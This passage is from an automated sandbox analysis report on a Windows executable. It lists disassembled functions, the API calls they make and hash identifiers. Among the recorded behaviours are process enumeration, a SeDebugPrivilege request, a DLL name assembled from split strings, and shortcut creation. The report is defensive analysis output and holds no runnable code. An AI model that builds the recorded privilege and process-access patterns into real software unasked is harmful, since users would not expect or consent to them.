                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F0630
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 004F0642
                                                                                                                                                                                                          • __allrem.LIBCMT ref: 004F0664
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F0672
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F0682
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 004F0694
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F06B9
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 004F06CB
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F06F0
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 004F0702
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F0719
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 004F072B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$___swprintf_l$__allrem
                                                                                                                                                                                                          • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                                                                                                                                                                                          • API String ID: 2797256748-2102732564
                                                                                                                                                                                                          • Opcode ID: c6d3d449d67c3002d3a794e9e66a2ed74b1253b5b53f65126e8a2ffe1f1697bc
                                                                                                                                                                                                          • Instruction ID: 5907b350e5f34a5239e610d513d85865ace62e288f1c0ef2e41ca8e5cfc663e5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6d3d449d67c3002d3a794e9e66a2ed74b1253b5b53f65126e8a2ffe1f1697bc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F4194B6B812A83AF92065496C06FBF161CEBD1F59F05042BFB04F718292996D2146FD
                                                                                                                                                                                                          Function 004AA300 Relevance: 24.4, APIs: 16, Instructions: 409memorystringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,00000000), ref: 004AA313
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004AA32B
                                                                                                                                                                                                          • LocalReAlloc.KERNEL32(?,?,00000042,00000001,?), ref: 004AA3EB
                                                                                                                                                                                                          • LocalSize.KERNEL32(00000000), ref: 004AA3FC
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?), ref: 004AA434
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 004AA43B
                                                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 004AA48A
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 004AA4B9
                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?,?), ref: 004AA53A
                                                                                                                                                                                                          • CharLowerBuffW.USER32(?,?,?), ref: 004AA549
                                                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 004AA5A9
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 004AA5F9
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,00000000), ref: 004AA702
                                                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(00000000), ref: 004AA709
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 004AA7C5
                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 004AA7CC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Heap$lstrlen$Process$AllocateBuffCharLocallstrcpy$AllocFreeLowerSizeUpper
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2363362608-0
                                                                                                                                                                                                          • Opcode ID: 0c9e0c2a2f9c2ea6b6de53bbe505b7f6adf009389cd9fcd2c9bd35fd9a6466e4
                                                                                                                                                                                                          • Instruction ID: b77b7fba4193eb915ddbb04b553bfc9438d7aefd2ad355a859e9a6762c1ccc13
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c9e0c2a2f9c2ea6b6de53bbe505b7f6adf009389cd9fcd2c9bd35fd9a6466e4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08F1C274B00606AFCB18DF78C544BAEB7B1FF55304F04462AE819A7390DB74AD64CB95
                                                                                                                                                                                                          Function 00450310 Relevance: 19.8, APIs: 13, Instructions: 299windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00450383
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,?,?,00000001), ref: 004503E1
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,?,?,00000003), ref: 004505EF
                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00450690
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,?,?,00000003), ref: 004506B8
                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 004506D1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostQuitShowWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3232434430-0
                                                                                                                                                                                                          • Opcode ID: e1306742cea122a22e55211ffafa4b6e5c468b2b17600fbe6ff437d5d8fe3e75
                                                                                                                                                                                                          • Instruction ID: 88e679e9d980c86c5fc973ad448f642b26991a64aed8ca518197629f86466142
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1306742cea122a22e55211ffafa4b6e5c468b2b17600fbe6ff437d5d8fe3e75
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEC10C74500609BBEB20DF20CC85BD9B774FF15304F10425AEA05A61D2EB75AADCCF99
                                                                                                                                                                                                          Function 00450080 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 178synchronizationtimewindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?,?,?), ref: 004500B1
                                                                                                                                                                                                            • Part of subcall function 00486C50: GetProcAddress.KERNEL32 ref: 00486D80
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00450168
                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000), ref: 0045020E
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00450230
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00450237
                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00450247
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,00000003), ref: 0045028A
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00450297
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,00000003), ref: 004502B8
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004502C5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ShowWindow$CountTick$AddressCloseCreateEventHandleLocalMessageObjectPostProcQuitSingleTimeWait
                                                                                                                                                                                                          • String ID: %I64d%d
                                                                                                                                                                                                          • API String ID: 676864848-2489624171
                                                                                                                                                                                                          • Opcode ID: 8a6503bf306ac5752a3bd76bb386aa833bd4ffe01a4f8f383f133f6f9918c645
                                                                                                                                                                                                          • Instruction ID: 30c08b5a3f4c3981425fc546ecf8c2decd1fede29d8afc949dfff43dea9be047
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a6503bf306ac5752a3bd76bb386aa833bd4ffe01a4f8f383f133f6f9918c645
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98614734600605EBD728DF24DC4DBEBB7A4FF14306F04026AF91997292CB78A958CB95
                                                                                                                                                                                                          Function 00460130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 177timeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00460190
                                                                                                                                                                                                          • UpdateWindow.USER32(?), ref: 00460199
                                                                                                                                                                                                          • SetTimer.USER32(?,0000080D,000003E8,00000000), ref: 00460280
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004602F0
                                                                                                                                                                                                          • SetWindowPos.USER32(?,000000FF,?,?,?,?,00000201), ref: 00460314
                                                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 0046031D
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00460328
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Show$ForegroundRectTimerUpdate
                                                                                                                                                                                                          • String ID: %ds$btn_Close$countdown_text1$countdown_text2
                                                                                                                                                                                                          • API String ID: 4221458010-784026027
                                                                                                                                                                                                          • Opcode ID: 1abd414938b5ce665989faa68cde5959edfef2d74d7e4ff1e3c71eb97e7710cc
                                                                                                                                                                                                          • Instruction ID: 3d372f7cc53981a324d6fc06ef82bcc375389a8d1f37053bac6b4e6cc6f61986
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1abd414938b5ce665989faa68cde5959edfef2d74d7e4ff1e3c71eb97e7710cc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C951D630640705BBDB11AB64CD8AFBF7BB6AF45B04F20012EF506A6191EF69AC419B19
                                                                                                                                                                                                          Function 00490410 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(0059810C), ref: 00490481
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0049049D
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0059810C), ref: 004904B8
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 0049052F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0049054F
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0059810C), ref: 00490571
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$AddressInit_thread_footerInitializeLibraryLoadProc__onexit
                                                                                                                                                                                                          • String ID: .dll$Netb$ios$neta$pi32
                                                                                                                                                                                                          • API String ID: 1978383653-4097919194
                                                                                                                                                                                                          • Opcode ID: 39bf99fd5d6cd78a678ee80769376aa58461de3a7febfbfe88c52aa785441fcf
                                                                                                                                                                                                          • Instruction ID: 21459527ff49951f05daf93ff5aeb0cc61a27a30a2da296593a39ef35cc5910a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39bf99fd5d6cd78a678ee80769376aa58461de3a7febfbfe88c52aa785441fcf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46419BB090420ADFDB10CFA8DD4979EBFF0BB19724F10826AE415A7390DBB49A44DF54
                                                                                                                                                                                                          Function 004A0320 Relevance: 15.1, APIs: 10, Instructions: 128filememoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004A03B4
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 004A03D0
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000000,00000000), ref: 004A03E3
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004A0401
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004A047F
                                                                                                                                                                                                            • Part of subcall function 004A0690: _wcschr.LIBVCRUNTIME ref: 004A06FB
                                                                                                                                                                                                            • Part of subcall function 004A0690: _wcschr.LIBVCRUNTIME ref: 004A0732
                                                                                                                                                                                                            • Part of subcall function 004A0690: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004A07DE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$AllocFile_wcschr$CloseCreateFreeHandleSize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1013191568-0
                                                                                                                                                                                                          • Opcode ID: f4398dc885939a87f1c59180b5c09518a1318a474fd14ba2b6e287f30e7e1cb0
                                                                                                                                                                                                          • Instruction ID: f6bacdbdc957fc5a9fe16b2a7bb7d1b17d671d9b5eddc1b40fb8306b4d774199
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4398dc885939a87f1c59180b5c09518a1318a474fd14ba2b6e287f30e7e1cb0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8341F575600208EFEB209F64DC49FEA77B8FF6A710F10046AFA05E7291DB749944DB60
                                                                                                                                                                                                          Function 0044C0C0 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 405COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ___from_strstr_to_strchr.LIBCMT ref: 0044C21A
                                                                                                                                                                                                            • Part of subcall function 00483DB0: GetProcAddress.KERNEL32 ref: 00483E2F
                                                                                                                                                                                                            • Part of subcall function 00483DB0: Process32First.KERNEL32(00000000,?), ref: 00483E54
                                                                                                                                                                                                            • Part of subcall function 00483DB0: Process32Next.KERNEL32(00000000,?), ref: 00483E7C
                                                                                                                                                                                                            • Part of subcall function 00483DB0: CloseHandle.KERNEL32(00000000), ref: 00483E83
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process32$AddressCloseFirstHandleNextProc___from_strstr_to_strchr
                                                                                                                                                                                                          • String ID: listmime$name$path$proc$reg$type$wow64
                                                                                                                                                                                                          • API String ID: 4217873175-1851501374
                                                                                                                                                                                                          • Opcode ID: 12272433b729f585193bdce10a4cbf64b8ab51b642fdefb4fd51f0ffb3b619f3
                                                                                                                                                                                                          • Instruction ID: 173a2630b8b5dfa9e6b936aa3ec7cb8159a19292642e96cda69c262f89bf9208
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12272433b729f585193bdce10a4cbf64b8ab51b642fdefb4fd51f0ffb3b619f3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EE1F8B09012149BEF64EB24CD95BEDB775AF81304F0481DEE509672C2DB789F85CB98
                                                                                                                                                                                                          Function 0046A100 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 178memorysynchronizationCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0046A1FF
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0046A206
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 0046A264
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0046A2CE
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0046A2D4
                                                                                                                                                                                                          • OpenProcess.KERNEL32(0000043A,00000000,00000000), ref: 0046A2E2
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?), ref: 0046A302
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$CurrentHeap$AllocateCloseHandleObjectOpenSingleWait
                                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                                          • API String ID: 1295659927-2896544425
                                                                                                                                                                                                          • Opcode ID: af362d12ca51ad1a4b4da40bd24647d643dd596e2fca7000bc9c6ce35382601d
                                                                                                                                                                                                          • Instruction ID: 6f20c2ddf9e607eec226d21a4c850be73cad63304627c84e4198316711b44ed4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: af362d12ca51ad1a4b4da40bd24647d643dd596e2fca7000bc9c6ce35382601d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1515C70914B0157E721AF349D06BBBB798AF96308F44472AFC45E2241FB34E994C797
                                                                                                                                                                                                          Function 004360F0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 176comCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 00436115
                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00436127
                                                                                                                                                                                                          • CoCreateInstance.COMBASE(005648F0,00000000,00000001,00564900,?), ref: 00436164
                                                                                                                                                                                                          • CoUninitialize.COMBASE ref: 0043620F
                                                                                                                                                                                                          • CoCreateInstance.COMBASE(00564920,00000000,00000001,005648E0,?), ref: 00436243
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateInstance$InitializeUninitialize_wcsstr
                                                                                                                                                                                                          • String ID: .url$?p$LNK
                                                                                                                                                                                                          • API String ID: 2533273046-3544018273
                                                                                                                                                                                                          • Opcode ID: 82a5ef31420450d929419d106448eccaa23333d11550efcd8255a27ff2fc7492
                                                                                                                                                                                                          • Instruction ID: d3f37d63530f3a25251d587c66f2cce99b07636d1ab527733b3ada5f76862bcc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82a5ef31420450d929419d106448eccaa23333d11550efcd8255a27ff2fc7492
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43512975A00219AFCB10DF98D888FAEBBB8BF49715F114199F905EB290CB71A904CB60
                                                                                                                                                                                                          Function 004981F0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetParent.USER32(?), ref: 0049821D
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00498225
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00498263
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000411,00000000,0000002C), ref: 00498286
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000433,00000000,0000002C), ref: 00498295
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004982DB
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000433,00000000,0000002C), ref: 004982F8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
